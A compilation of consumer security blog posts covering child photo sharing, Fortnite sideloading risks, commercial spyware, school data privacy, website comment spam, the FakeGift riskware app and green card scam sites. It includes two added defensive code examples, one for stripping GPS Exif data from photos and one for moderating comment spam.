Confession time. I’m a mom who is part of the problem. The problem of posting photos of my kids online without asking for their permission and knowing deep down that I’m so excited about sharing, I’m not paying much attention at all to the risks.

Why do I do it? Because I’m madly in love with my two wee ones (who aren’t so wee anymore). Because I’m a proud parent who wants to celebrate their milestones in a way that feels meaningful in our digital world. And, if I’m honest, I think posting pictures of my kids publicly helps fill up their love tank and remind them they are cherished and that they matter. . . even if the way I’m communicating happens to be very public.

Am I that different than most parents? According to a recent McAfee survey, I’m in the majority.

Theoretically, I represent one of the 1,000 interviewed for McAfee’s recent Age of Consent survey* that rendered some interesting results.

Can you relate?

  • 30% of parents post a photo of their child to social media daily.
  • 58% of parents do not ask for permission from their children before posting images of them on social media.
  • 22% think that their child is too young to provide permission; 19% claim that it’s their own choice, not their child’s choice.

The surprising part:

  • 71% of parents who share images of their kids online agree that the images could end up in the wrong hands.
  • Parents’ biggest concerns with sharing photos online include pedophilia (49%), stalking (48%), and kidnapping (45%).
  • Other risks of sharing photos online may also be other children seeing the image and engaging in cyberbullying (31%), their child feeling embarrassed (30%), and their child feeling worried or anxious (23%).

If this mere sampling of 1,000 parents (myself included) represents the sharing attitudes of even a fraction of the people who use Facebook (estimated to be one billion globally), then rethinking the way in which we share photos isn’t a bad idea.

We know that asking parents, grandparents, friends, and kids themselves to stop uploading photos altogether would be about as practical as asking the entire state of Texas to line up and do the hokey pokey. It’s not going to happen, nor does it have to.

But we can dilute the risks of photo sharing. Together, we can agree to post smarter, to pause a little longer. We can look out for one another’s privacy, and share in ways that keep us all safe.

Ways to help minimize photo sharing risks:

  • Pause before uploading. That photo of your child is awesome, but have you stopped to analyze it? Ask yourself: Is there anything in this photo that could be used as an identifier? Have I inadvertently given away personal information such as a birthdate, a visible home address, a school uniform, financial details, or potential passwords? Is the photo I’m about to upload something I’d be okay with a stranger seeing?
  • Review your privacy settings. It’s easy to forget that when we upload a photo, we lose complete control over who will see, modify, and share that photo again (anywhere they choose and in any way they choose). You can minimize the scope of your audience to only trusted friends and family by customizing your privacy settings within each social network. Platforms like Facebook and Instagram have privacy settings that allow you to share posts (and account access) with select people. Use the controls available to boost your family privacy.
  • Voice your sharing preferences with others. While it may be awkward, it’s okay (even admirable) to ask friends and family to rein in or refrain from posting photos of your children online. This rule also applies to other people’s public comments about your vacation plans, new house, children’s names or birthdates, or any other content that gives away too much data. Don’t hesitate to promptly delete those comments by others and explain yourself in a private message if necessary.
  • Turn off geotagging on photos. Did you know that the photo you upload has metadata assigned to it that can tell others your exact location? That’s right. Many social networks will tag a user’s location when that user uploads a photo. To make sure this doesn’t happen, simply turn off geotagging abilities on your phone. This precaution is particularly important when posting photos away from home.
  • Be mindful of identity theft. Identity theft is no joke. Photos can reveal a lot about your lifestyle, your habits, and they can unintentionally give away your data. Consider using an identity theft protection solution like McAfee Identity Theft Protection that can help protect your identity and safeguard your personal information.
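
The geotagging tip above rests on a concrete fact: a JPEG can carry an Exif block with a GPS IFD, and anyone holding the file can read the coordinates out of it. The following is an added example, not McAfee code: it constructs a small sample JPEG with nothing but GPS tags (the coordinates are sample values), reads the latitude and longitude back the way a metadata viewer would, and strips the Exif segment so the file can be checked before it is shared. Only the Python standard library is used; the segment walker, IFD reader and builder are this example's own helpers.

```python
import struct

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
APP1 = 0xFFE1
EXIF_HEADER = b"Exif\x00\x00"
TAG_GPS_IFD = 0x8825
TYPE_ASCII, TYPE_LONG, TYPE_RATIONAL = 2, 4, 5
GPS_TAGS = (0x0001, 0x0002, 0x0003, 0x0004)   # LatitudeRef, Latitude, LongitudeRef, Longitude

def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref) -> bytes:
    """Construct a minimal JPEG (SOI, one Exif APP1 segment, EOI) whose only
    metadata is a GPS IFD. Sample data for the demo, not a real camera file."""
    tiff = bytearray(b"II*\x00" + struct.pack("<I", 8))      # little-endian, IFD0 at 8
    gps_ifd_off = 8 + 2 + 12 + 4                              # IFD0 holds one entry
    tiff += struct.pack("<H", 1)
    tiff += struct.pack("<HHII", TAG_GPS_IFD, TYPE_LONG, 1, gps_ifd_off)
    tiff += struct.pack("<I", 0)                              # no IFD1
    data_off = gps_ifd_off + 2 + 12 * 4 + 4                   # rationals follow the GPS IFD
    lat_raw = b"".join(struct.pack("<II", n, d) for n, d in lat_dms)
    lon_raw = b"".join(struct.pack("<II", n, d) for n, d in lon_dms)
    tiff += struct.pack("<H", 4)
    # ASCII values of four bytes or fewer are stored inline in the value field
    tiff += struct.pack("<HHI4s", 0x0001, TYPE_ASCII, 2, lat_ref.encode() + b"\x00")
    tiff += struct.pack("<HHII", 0x0002, TYPE_RATIONAL, 3, data_off)
    tiff += struct.pack("<HHI4s", 0x0003, TYPE_ASCII, 2, lon_ref.encode() + b"\x00")
    tiff += struct.pack("<HHII", 0x0004, TYPE_RATIONAL, 3, data_off + len(lat_raw))
    tiff += struct.pack("<I", 0) + lat_raw + lon_raw
    payload = EXIF_HEADER + bytes(tiff)
    return SOI + struct.pack(">HH", APP1, len(payload) + 2) + payload + EOI

def iter_segments(data: bytes):
    """Yield (marker, start, end) for each marker segment up to SOS or EOI."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = 0xFF00 | data[pos + 1]
        if marker in (0xFFD9, 0xFFDA):          # EOI or start of scan: stop walking
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, pos + 2 + length
        pos += 2 + length

def _is_exif(data, start):
    return data[start + 4:start + 10] == EXIF_HEADER

def _read_ifd(tiff, off, e):
    """Return {tag: (type, count, raw 4-byte value field)} for one IFD."""
    (count,) = struct.unpack(e + "H", tiff[off:off + 2])
    entries = {}
    for i in range(count):
        p = off + 2 + 12 * i
        tag, typ, n = struct.unpack(e + "HHI", tiff[p:p + 8])
        entries[tag] = (typ, n, tiff[p + 8:p + 12])
    return entries

def _rationals(tiff, raw, n, e):
    """Follow the offset in a value field and read n unsigned RATIONALs."""
    (off,) = struct.unpack(e + "I", raw)
    out = []
    for i in range(n):
        num, den = struct.unpack(e + "II", tiff[off + 8 * i:off + 8 * i + 8])
        out.append(num / den if den else 0.0)
    return out

def _to_decimal(dms, ref):
    deg, minutes, seconds = dms
    value = deg + minutes / 60 + seconds / 3600
    return -value if ref in ("S", "W") else value

def extract_gps(data: bytes):
    """Return (lat, lon) in decimal degrees if GPS tags are present, else None."""
    for marker, start, end in iter_segments(data):
        if marker != APP1 or not _is_exif(data, start):
            continue
        tiff = data[start + 10:end]
        e = "<" if tiff[:2] == b"II" else ">"
        (ifd0_off,) = struct.unpack(e + "I", tiff[4:8])
        ifd0 = _read_ifd(tiff, ifd0_off, e)
        if TAG_GPS_IFD not in ifd0:
            return None
        (gps_off,) = struct.unpack(e + "I", ifd0[TAG_GPS_IFD][2])
        gps = _read_ifd(tiff, gps_off, e)
        if not all(t in gps for t in GPS_TAGS):
            return None
        lat_ref = gps[0x0001][2][:1].decode("ascii")
        lon_ref = gps[0x0003][2][:1].decode("ascii")
        lat = _to_decimal(_rationals(tiff, gps[0x0002][2], 3, e), lat_ref)
        lon = _to_decimal(_rationals(tiff, gps[0x0004][2], 3, e), lon_ref)
        return lat, lon
    return None

def strip_exif(data: bytes) -> bytes:
    """Return a copy of the JPEG with every Exif APP1 segment removed."""
    out, pos = bytearray(SOI), 2
    for marker, start, end in iter_segments(data):
        if not (marker == APP1 and _is_exif(data, start)):
            out += data[start:end]
        pos = end
    return bytes(out + data[pos:])

if __name__ == "__main__":
    photo = build_sample_jpeg([(37, 1), (46, 1), (295, 10)], "N",
                              [(122, 1), (25, 1), (95, 10)], "W")
    print("before:", extract_gps(photo))
    print("after: ", extract_gps(strip_exif(photo)))
```

Turning off location tagging on the phone stops the coordinates from being written in the first place; the check above is for photos that already exist, and it is worth remembering that some sharing services strip Exif on upload while others keep it, so the only safe assumption is that whatever is in the file travels with it.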

* McAfee commissioned OnePoll to conduct a survey of 1,000 parents of children ages one month to 16 years old in the U.S.

The post Could the Photos You’re Sharing Online Be Putting Your Child at Risk? appeared first on McAfee Blogs.

Fortnite’s Google Play rebuff sparks security concerns for Android users

There’s been no small outbreak of chaos in mobile land recently, all because of an astonishingly popular game called Fortnite.

Here’s the thing: people refer to Android as “open platform,” saying that, in theory, you can do what you want with it. In practice, you buy an Android phone and then you’re locked into apps from the Google Play store. You can switch things off to allow external installs, but it’s generally not advisable, as it leaves the gate open to potentially dubious installs.

You can delve into discussions about whether Android is open source or not, but the conversation is a little more complicated and nuanced than simply answering “yes” or “no.”

With all of the above discord thrown into a melting pot and swirled around, Fortnite steps in and rattles a few more cages.

What happened?

The developers, Epic, decided that they’d rather offer the game on mobile outside of Google Play, which drastically increases the amount of revenue not nibbled at by Google. There are multiple potential issues with this:

  • Having children enable the “allow installs from unknown sources” option on an Android is a recipe for disaster. It not only means many of them will inevitably end up downloading a rogue app by mistake, it also means that those phones are now less secure than the fully locked-down Android devices out there.
  • As pointed out on Twitter, even children with legitimate installs of Fortnite onboard will eventually fall foul to something nasty because the phone is splashing around in the metaphorical malware mud.
  • Everything comes down to how well promoted the official download link is, and how efficiently the game developers tell people to only grab the game from that one specific link.
  • Epic needs to ensure they don’t fall victim to sophisticated SEO scams pointing links away from their site and toward bad downloads, and also that their site security is top notch. If the page is compromised, a rogue download link might be waiting in the wings.

That’s how the initial landscape looked shortly after Epic’s announcement, and many predicted things would quickly go horribly wrong.

Did things go horribly wrong?

They most certainly did. In the end, it wasn’t even a rogue app causing mayhem but a flaw in Fortnite’s installer that made it possible for rogue apps already on the device to hijack the installer and install their own junkware. The so-called “Man in the Disk” attack looks for apps that don’t lock down their use of external storage as well as they should, and quickly gets to work exploiting what is happening under the hood.

The uproar over the installer kerfuffle was rounded off with a bit of a fierce debate on Twitter, because that’s what happens with everything in life now.

What happens next?

Whether they like it or not, Epic are now the standard bearer for “app developer going off range into the (incredibly wealthy and insecure) wilderness.” I don’t believe an Android app has attracted quite this much attention before, and that’s without throwing the no Google Play install angle into the mix.

What they’re also stuck with is the realization that for as long as they continue to remain outside of the Google Play ecosystem, stories will come back to haunt them regarding malware installs masquerading as the real thing, social engineering tricks convincing children to download dodgy Fortnite add-ons from Russian servers, and potential SEO poisoning leading would-be gamers astray.

Google Play certainly isn’t perfect, and plenty of rogue apps have been found lurking there through the years. I think most security professionals would argue it’s still an awful lot riskier to switch off the unknown source install ban than it is to visit Play and grab an app, though.

Let’s also not single out Epic on this one; it’s not just game developers taking tentative steps into the world of unknown installs—even mobile phone providers do it. About four or five years ago, I replaced my phone and took out a package deal with a well-known UK retailer. Part of the deal was “six free games for your Android.” Sounds great, right? Except I quickly realized that to get the games, you had to enable unknown source installs and download the six .APK files directly from the phone provider’s website.

At no point did anyone say anything about how turning off a security feature of the phone I’d just been sold was a bad idea. Nothing in the literature provided mentioned anything beyond, “Wow, turning this off is a really good idea, free games! Wow!” This is also at a time when I was regularly writing about fake Angry Birds/Flappy Bird downloads hosted on Russian websites.

Once installed (via dragging and dropping from desktop to mobile through the magic of USB cables), those fake bird-themed games would typically try and perform premium rate SMS shenanigans. This only worked because some people were running around with unknown source installs permitted, and they’d still have to try and social engineer the ones that weren’t into turning it on.

Unknown installs: so hot right now

Now we’re at a point where unknown source installs are not only mainstream but currently attached to the wheels of an absolute gaming juggernaut. There are serious security issues that Epic needs to consider, and it’s going to be fascinating looking back in six to 12 months and deciding if promoting unknown source installs in this way caused a maelstrom of security headaches from all sides, or a large pile of “absolutely nothing much happened.”

If it’s the latter, you can bet more developers will want to take advantage of this method. Then the threat landscape will become significantly more complicated in mobile land.

The post Fortnite’s Google Play rebuff sparks security concerns for Android users appeared first on Malwarebytes Labs.

When spyware goes mainstream

Stealware.

Surveillanceware.

Stalkerware.

These are terms used interchangeably to identify a file-based threat that has been around since 1996: spyware. More than two decades later, consumer or commercial spyware has gone mainstream, and the surprising amount of software designed, openly marketed, and used for spying on people is proof of that.

Forget the government, nation-states, private agencies, and law enforcement. Normal, ordinary citizens can now wield powerful surveillance software and use it against any target they wish—all thanks to “legitimate” companies like mSpy, Retina-X, FlexiSpy, Family Orbit, TheTruthSpy, and others. While the spyware they market can be placed in the hands of employers who want to keep tabs on employees in the workplace, or in the hands of parents who want to look after their kids, it can also be placed in the hands of stalkers, abusive partners, or someone who just wants to get a leg up in the divorce proceedings.

Spyware: spotting the signs

Spyware is usually stealthy by nature—but that doesn’t mean its activities or the effects of its presence on a desktop machine, laptop, or mobile device go unnoticed. Below is a rundown of common symptoms that may indicate your computing devices have spyware installed:

Desktop or laptop:

  • Computer or device sluggishness
  • Crashing (when it usually doesn’t)
  • Multiple, unexpected pop-ups
  • Changes in certain browser settings
  • Unusual redirections to sites you haven’t seen or visited
  • Difficulty logging in to secure websites
  • New browser toolbars, widgets, or apps
  • The appearance of random error messages
  • Certain browser hotkeys stop working

Mobile phone or tablet:

  • Battery runs out quicker than normal
  • The device feels warm even when not in use and not charging
  • Increased data usage/Internet activity
  • Clicking, static, echo-y, or distant voices can be heard when on a call
  • Takes a while to shut down
  • Unexplained phone charges, phone calls, and messages
  • Autocorrect features stop working correctly
  • Longer response time
  • For iPhones: Presence of the Cydia app (although there are products now that don’t require a jailbroken iPhone)
  • For iPhones: Request for Apple ID credentials

Read: IoT domestic abuse: What can we do to stop it?


Spying is caring?

While many of us wrinkle our noses in disgust at spyware, some well-intentioned individuals see the good in planting and using such software in the devices of their loved ones. As mentioned earlier, parents (for example) want to stay in touch with their kids who are out and about. Sometimes just knowing where they are when Mom or Dad checks up on them—of course, they aren’t going to pick up the phone—can help them go about their day a little easier.

If you are already considering or using commercial spyware to “keep an eye” on your kids, we suggest you ask yourself the following questions:

Will I be/Am I breaking any laws?

You are if the following qualifications are true:

The states of Iowa and Washington criminalize some forms of spyware.

Even spyware developers have the Software Principles Yielding Better Levels of Consumer Knowledge (or the SPY BLOCK Act), the Securely Protect Yourself Against Cyber Trespass (or the SPY ACT), and the Internet Spyware Prevention Act (or The I-SPY Act) to contend with.

Have I already looked for better alternatives?

Almost every “legitimate” spy software in the market wears the slogan “completely undetectable,” or a variant of it. As we always say, if it sounds too good to be true, it probably is. Not only is spyware often detectable (see symptoms above), it’s also intruding on privacy. Instead of installing spyware, look for alternative apps that can help you monitor your loved one’s locations without snooping on their other stuff like messages and calls. If you’re an iPhone user, take advantage of Find My Friends. For Android users, you can use Trusted Contacts.

Do I know how these companies treat my target’s information?

“Carelessly” is probably the first word that comes to mind. Just look at the number of breaches that have happened against spyware companies in the last 18 months. Not only that, hackers who claim to target these companies consistently state that the data they siphoned from spyware targets aren’t encrypted at all.

How would I feel if I were in their shoes?

Monitoring a loved one isn’t inherently wrong in and of itself, but doing so without their consent is, even if it’s well-intentioned. This is why it’s so essential for all individuals involved to ask for and give consent when it comes to installing monitoring apps on devices. This doesn’t just apply to the parent-child dynamic.

Of course, many parents of pre-teens feel and believe that consent is optional, so they exercise their tough love on the young ones for a little while longer for their own protection and safety. As long as monitoring doesn’t (and it shouldn’t) replace healthy communication between parent or carer and child, this is fine. Parents of teens, on the other hand, may have to reassess their monitoring practices. Perhaps it’s time they sit down with the kids and talk to them about it.

Spying on someone without them knowing sucks. And when they do find out, even if you mean well, the damage caused by the invasion of privacy and breach of trust could be rather hard to undo.

Whether you think it’s beneficial or not to use spyware doesn’t change the fact that it’s still classified as malware, and malware—regardless of the law—isn’t something that should typically be found installed on computing devices of average users.

Stay safe, everyone!

The post When spyware goes mainstream appeared first on Malwarebytes Labs.

Family Tech: How Safe is Your Child’s Personal Data at School?

Right about now, most kids are thinking about their chemistry homework, the next pep rally, or chiming in on their group text. The last thing on their minds as they head back to school is cybersecurity. But, it’s the one thing — if ignored — that can wreck the excitement of a brand new school year.

You’ve done a great job, parent. You’ve equipped their phones, tablets, and laptops with security software. And, you’ve beefed up safeguards on devices throughout your home. These efforts go a long way in protecting your child’s (and family’s) privacy from prying eyes. Unfortunately, when your child walks out your front door and into his or her school, new risks await.

No one knows this season better than a cybercriminal. Crooks know there are loopholes in just about every school’s network and that kids can be easy targets online. These security gaps can open kids up to phishing scams, privacy breaches, malware attacks, and device theft.

The school security conversation

Be that parent. Inquire about your school’s security protocols. The K-12 Cybersecurity Resource Center reports that 358 school breaches have taken place since January of 2016. Other reports point to an increase in hackers targeting school staff with phishing emails and seeking student social security numbers to sell on the dark web.

A few questions to consider:

  • Who has physical and remote access to your student’s digital records and what are the school’s protection practices and procedures?
  • How are staff members trained and are strong password protocols in place?
  • What security exists on school-issued devices? What apps/software are being used, and how will those apps collect and use student data?
  • What are the school’s data collection practices? Do data collection practices include encryption, secure data retention, and lawful data sharing policies?
  • What is the Bring Your Own Device (BYOD) policy?

The data debate

As K-12 administrators strive to maintain secure data collection practices for students, those same principles may be dubious as kids move on to college. As reported by Digiday, one retailer may be quietly disassembling privacy best practices with a bold “pay with data” business model. The Japanese coffee chain Shiru Café offers students and faculty members of Brown University free coffee in exchange for entering personal data into an online registry. Surprisingly, the café attracts some 800 customers a day and is planning on expanding its business model to more college campuses.

The family conversation

Keep devices close. Kids break, lose, lend, and leave their tech unattended and open to theft. Discuss responsible tech ownership with your kids. Stolen devices are privacy gold mines.

Never share passwords. Kids express their loyalty to one another in different ways. One way that’s proving popular but especially unsafe nowadays is password sharing. Remind kids: It’s never okay to share passwords to devices, social networks, or school platforms. Never. Password sharing opens up your child to a number of digital risks.

Safe clicking, browsing practices. Remind kids when browsing online to watch out for phishing emails, fake news stories, streaming media sites, and pop-ups offering free downloads. A bad link can infect a computer with a virus, malware, spyware, or ransomware. Safe browsing also includes checking for “https” in the URL of websites. If the website only loads with an “http,” the website may not be enforcing encryption.

Be more of a mystery. Here is a concept your kids may or may not latch on to but challenge them to keep more of their everyday life a mystery by posting less. This includes turning off location services and trying to keep your whereabouts private when sharing online. This challenge may be fun for your child or downright impossible, but every step toward boosting privacy is progress!

Discuss the risk of public Wi-Fi. Kids are quick to jump on Wi-Fi wherever they go so they can use apps without depleting the family data plan. That habit poses a big problem. Public Wi-Fi is a magnet for hackers trying to get into your device and steal personal information. Make sure every network your child logs on to requires a password to connect. Go a step further and consider using a Virtual Private Network (VPN) for added security for your whole family.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online, and follow @McAfee_Family on Twitter. Also, join the digital security conversation on Facebook.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post Family Tech: How Safe is Your Child’s Personal Data at School? appeared first on McAfee Blogs.

Official Cardi B website plagued by spammers

We come bearing tidings of proper website maintenance and general housekeeping for singer Cardi B (or rather, for her web development team). At first glance, it appeared as though her website had been hacked a few days ago. But a look under the hood told a different story.

We were surprised to see the following lurking on the official Cardi B website:

Cardi spam

Ignore the privacy policy pop-up. Websites can’t get enough of those these days, thanks to GDPR. No, what we’re talking about is the peculiar blast of messed up spam text all over the page. Had it been compromised? Or was something else to blame?

Things certainly didn’t look great. Even worse for the singer, the front page of her site was touting similar spammy vids:

Video spam

I could be wrong, but I don’t think her fans are particularly interested in clickthroughs to fake movie streams and a football match involving Stoke City and Wigan Athletic. The spam links also found their way onto the photos page:

photo spam

Those are definitely photos, but not so much of a singer singing. What happened here?

It seems the site allows people to sign up as registered users, then post comments. Somewhere along the line, this feature has attracted the ire of spammers who figured out a way to not only plaster individual pages with spam links, but also feed said spam onto various main sections of the site as a whole.

We’ve posted at length regarding the correct treatment of user-posted comments, and we’ve also taken a look at how things can go wrong with plugins and third-party tools. When it comes to our own site, we keep a sharp eye on spam, moderate comments, and close comments sections after a certain amount of time. With the amount of junk floating around the web, you can’t afford to be lax where keeping a tidy online presence is concerned.
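
The three habits named above (watch for spam, moderate comments, close comment sections after a while) can be written down as a policy rather than left to intuition. The following is an added example, not code from Malwarebytes or from the Cardi B site: a small moderation routine that closes comments on old posts, scores each comment on link count, streaming-spam phrasing and account age, and returns whether to publish, hold for a human, or reject. The thresholds, the spam phrases and the sample comments are all assumptions constructed for the demo; the example.com/.net/.org addresses are placeholders.

```python
import re
from datetime import timedelta

# Policy knobs. These are assumptions for the example, not settings taken
# from Cardi B's site or from Malwarebytes.
COMMENT_WINDOW = timedelta(days=30)   # close comments on posts older than this
NEW_ACCOUNT_AGE = timedelta(days=1)   # accounts younger than this get extra scrutiny
FREE_LINKS = 1                        # links beyond this count against the comment
URL_RE = re.compile(r"https?://\S+|\b[\w-]+\.(?:com|net|org|info|club|xyz)\b", re.I)
SPAM_TERMS = ("full movie", "live stream", "watch online", "free download", " vs ")
HOLD_AT, REJECT_AT = 2, 5

def spam_score(text: str, account_age: timedelta) -> int:
    """Heuristic score: extra links, streaming-spam phrasing and links posted
    from brand-new accounts each add points."""
    links = URL_RE.findall(text)
    lowered = text.lower()
    score = max(0, len(links) - FREE_LINKS) * 2
    score += sum(1 for term in SPAM_TERMS if term in lowered)
    if links and account_age < NEW_ACCOUNT_AGE:
        score += 2
    return score

def moderate(text: str, account_age: timedelta, post_age: timedelta) -> str:
    """Decide a comment's fate: closed, reject, hold (for a human) or publish."""
    if post_age > COMMENT_WINDOW:
        return "closed"
    score = spam_score(text, account_age)
    if score >= REJECT_AT:
        return "reject"
    if score >= HOLD_AT:
        return "hold"
    return "publish"

# Constructed sample comments: (text, commenter's account age, age of the post)
SAMPLE_COMMENTS = [
    ("Loved the show last night!", timedelta(days=10), timedelta(days=2)),
    ("Stoke City vs Wigan Athletic live stream http://example.com/watch "
     "http://example.net/stream full movie", timedelta(hours=0), timedelta(days=1)),
    ("Nice post, more at http://example.org", timedelta(hours=2), timedelta(days=1)),
    ("great", timedelta(days=400), timedelta(days=60)),
]

def review_queue(comments=SAMPLE_COMMENTS):
    """Run the policy over a batch and return the verdicts in order."""
    return [moderate(text, acct, post) for text, acct, post in comments]

if __name__ == "__main__":
    for (text, _, _), verdict in zip(SAMPLE_COMMENTS, review_queue()):
        print(f"{verdict:8} {text[:50]}")
```

The "hold" outcome is the important one: a single link from an hours-old account is not proof of spam, but it is exactly the shape of the registrations that overran the site above, so it should wait for a moderator rather than go straight onto the front page.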

While the rogue pages in question seem to have been taken down, simply searching for the Cardi B website in Google reveals the damage done to the site’s search results:

google results

Spammy results such as the above can take a long time to filter out of search engines, and it isn’t great to have things like that sitting at the top of the searches alongside legitimate results.

more spam

There’s been a cleanup since Cardi B fans started talking about it on social media. Though you can still access the login page for existing user accounts on the site, it looks as though new sign-ups have been disabled so the site admins can bring everything back under control.

registration

While a spam outbreak is never good, especially when it spills onto your home page, it appears the scammers had nothing but spam in mind—so no malware links were forthcoming. What was in evidence, however, was any number of cookie-cutter links to video streaming sites and YouTube clips.

movie stream site

With so many links spammed, and tedious work to be done to check each one individually, there’s no way to guarantee final destinations were entirely free from harm. If you think you might have ended up on something other than a YouTube video or movie sign-up page via any of these links, then it’s a good idea to run some anti-malware scans on your PC and ensure you’re clean.

As for Cardi B, hopefully the site admins will be able to keep a lid on the kind of spam outbreaks they’ve experienced over the last couple of days. Social features for users of your site are great, but those services need to be balanced with tight moderation and a limit on where said features can take you—even if it is Stoke City versus Wigan Athletic.

The post Official Cardi B website plagued by spammers appeared first on Malwarebytes Labs.

Mobile Menace Monday: FakeGift is the gift that keeps on frustrating

Last spring, we found yet another piece of riskware on Google Play we call Android/PUP.Riskware.FakeGift. Based on Hindi characters found in the code, we can assume it originates from India. With over 50,000 installs before being removed from Google Play, FakeGift apparently kept on giving—frustration to its users, that is.

Gift cash money

As the name implies, FakeGift offers just that—fake gifts. Admittedly, it does so in a kind of fun way. Here’s how it works: Every day you are given 10 free “gifts.” As shown below, after the opening splash screen, the home page displays a gift box.

Press the gift box and you’ll receive a “gift” in rupees. The amount of rupees gifted is random. The gifted amount is then added to a balance found in the upper right part of the screen.

After pressing the gift box 10 times, it will let you know you’re done for the day—even after closing and reopening.

You can also accumulate rupees by pressing “Share,” which redirects you to WhatsApp. Note that if you don’t have WhatsApp, it just gives an error message stating, “Whatsapp not installed on this device.” Once in WhatsApp, simply pick a victim…er…friend to send a message. In Hindi, the message says:

सभी स्मार्टफोन यूजर ध्यान दे 📱📱📱ऑनलाइन पैसे 💰कमाने का एक बहुत ही सुनहरा अवसर हैं आपके पास, “इसे एक बार जरूर पढ़े”| 👇👇👇👇👇 🎁🎁🎁 गिफ्ट मनी में आपका स्वागत हैं🎁🎁🎁गिफ्ट मनी दे रहा हैं पैसे कमाने का एक सुनहरा मौका गिफ्ट खोले और पैसा कमाए | गिफ्ट मनी अप्प में आप रोजाना 400-500 रूपए आसानी से कमा सकते हो | महीने के 15000 से 20000 रूपए आपकी इनकम हो सकती हैं | दोस्तों आपको 1 दिन में 10 गिफ्ट मिलेंगे उन गिफ्ट को आपको खोलना हैं आपके लक के अनुसार गिफ्ट में कितने भी रूपए निकल सकते हैं और गिफ्ट मनी आपको फ्री में गिफ्ट नहीं दे रहा हैं आपको रोजाना अप्प में 10 मिनट का वर्क करना हैं उसी के पैसे आपको दे रहा हैं तो दोस्तों पैसे कमाने के इस अच्छे मोके को गवांये नहीं और अभी डाउनलोड करे और वर्क स्टार्ट कर दे| Download this link <hidden Google Play link>

Rough translation using Google Translate:

All Smartphone users pay attention 📱📱📱 Online money is a great opportunity to make money, “You must read it once.” 👇👇👇👇👇 में Welcome to Gift MoneyGift Money is giving you a golden opportunity to earn money, open gifts and earn money. You can easily earn 400-500 rupees per day in the Gift Money App. You can earn from 15,000 to 20000 rupees a month. Friends, you will get 10 gifts in 1 day, you have to open those gifts according to your luck, how many rupees can get in the gift and gift gift is not giving you a free gift. You have to work 10 minutes daily in the work of the money If you are giving it, then guys do not miss this good thing to earn money and download it now and start work. Download this link <hidden Google Play link>

Every WhatsApp message sent is an additional 10 rupees.

FakeGift, the gift that keeps on giving…absolutely nothing

After accumulating some rupees, you can then press “Payment” from the home screen to redeem. As shown below, you have three payment options.

Picking PayPal, it pops up this message.

Translation: For Balance Transfer in Paypel First Time should be 5000 rupees. After that you can transfer the balance daily. Thank you.

Here’s where it gets shady. After you accumulate the required 5,000 rupees, you still can’t transfer the money. Angry Google Play reviews show the disappointment.

One review (very) roughly translates to, “The money has to be 5000 every time you are cutting money and not being added, this is a fake app. Friends, do not waste your time.”

The fun ends

Although fun at first, the realization that there’s no award at the end turns fun into frustration. For many, this comes only after sharing with multiple friends via WhatsApp. Using this method, the app was able to gain over 50,000 installs. Also, another variant was found using a different name, but playing the same game. It also received around 50,000 installs. The good news is the only damage done is wasted time and nothing worse. Stay safe out there!

The post Mobile Menace Monday: FakeGift is the gift that keeps on frustrating appeared first on Malwarebytes Labs.

Green card scams: preying on the desperate

Thanks to @nullcookies for providing leads.

Most online scams depend on two things for success: a broken or otherwise onerous process to deal with a legitimate entity, and a desperate target population. With immigration, there are many, many burdensome processes to navigate, and most applicants involved are at least somewhat desperate due to costs and lengthy time expenditures. The result is an environment ripe for green card scams.

Looks real, but came from a scam site

Officialgreencardlottery.org (which is, in fact, none of these things) is a great example of how borrowing the symbolism and language of legitimate authorities, combined with limited authentic communications from those authorities, can create an environment ripe for scamming.

The site is professionally designed, down to a fake logo that approximates the US State Department logo as closely as legally possible. There are multiple urgent calls to action, with red “Apply Today” buttons on most pages, and dire warnings of what can happen to you if your application is entered too late. But scrolling down to the bottom, we see the following:

Which reads:

USA Green Card Office is not affiliated with the U.S. Government or any government agency. You can enter the U.S. Diversity Visa Lottery for Free at www.state.gov in between their open registration dates which typically start in early October 2018. We are not a law firm, we do not provide legal advice, and are not a substitute for an attorney. This site provides a review and submission service that requires a fee.

So not only are they not affiliated with the US government, they’re not attorneys, and therefore probably know nothing about immigration law and cannot provide meaningful help with any green card issues.

Passive DNS on the site doesn’t reveal much, except two additional sites, usa-dvprogram[.]info and us-dvprogram[.]info. Stepping backwards to the last IP resolution shows the following:

official-dvlottery.us, official-usagcl.org, officialusagcl.org, usagc-eligibility.online, usagclmessage1.online

After finding little of interest in the scam infrastructure, we decided to register as a prospective immigrant and see what services were on offer.

After paying $129 for the privilege of surrendering some personal information, we promptly got a “verification call” from a man with a South Asian accent. We asked repeatedly about the process, when our application would be forwarded to the relevant officials, and how to move forward. The operator responded with a hard sell to “upgrade” our application for multiple chances to win. (This is not how the real lottery works.)

At no time were we provided any information on the real process, nor did the operator disclose at all what his company would do for us. Based on our experience with the call, the provider does not offer any services whatsoever, but will gladly take both money and significant amounts of personal data. As a scam overall, we rate it as a B-.

A question that often arises amongst defenders with these sorts of scams is, “Who could possibly fall for that?” The answer is typically, “probably you.” Let’s look at why.

Below is the real green card lottery site at https://www.dvlottery.state.gov:

Unlike the scam site, the real one provides essentially no information on what the lottery is or how to apply. Signifiers of authenticity are limited to a small logo on the top left. There is no guidance on how to get further information.

By contrast, the scam site provides the basics on what the lottery is, some brief application statistics, and has large, prominent branding all over the site. If you, a prospective applicant, were to be presented with both sites, which one would feel more authentic? Which one would you choose if you had limited financial resources and could only apply once? Which would feel more accommodating if you had limited English skills?

What’s happening with this scam site and the U.S. Department of State site above is quite similar to what we see with legitimate tech support and tech support scammers. An official entity does a poor job communicating with its constituency, and that creates a vacuum that scammers are all too eager to fill. So while there are concrete steps that an end user can take to stay safe from this sort of thing (see here), large companies and government agencies shoulder a share of the blame as well.

Rather than dismissing the individual who fell for the scam, a more viable approach for security personnel is to collaborate across the company to make sure corporate communications don’t leave room for scammers to exploit. Does your marketing newsletter look like a scam? Do your support staffers authenticate themselves upon request? Can they verify third parties that work with you? These are all solvable problems that can prevent at least a portion of users from being victimized.

The post Green card scams: preying on the desperate appeared first on Malwarebytes Labs.

College Bound? 7 Important Technology Habits for Students

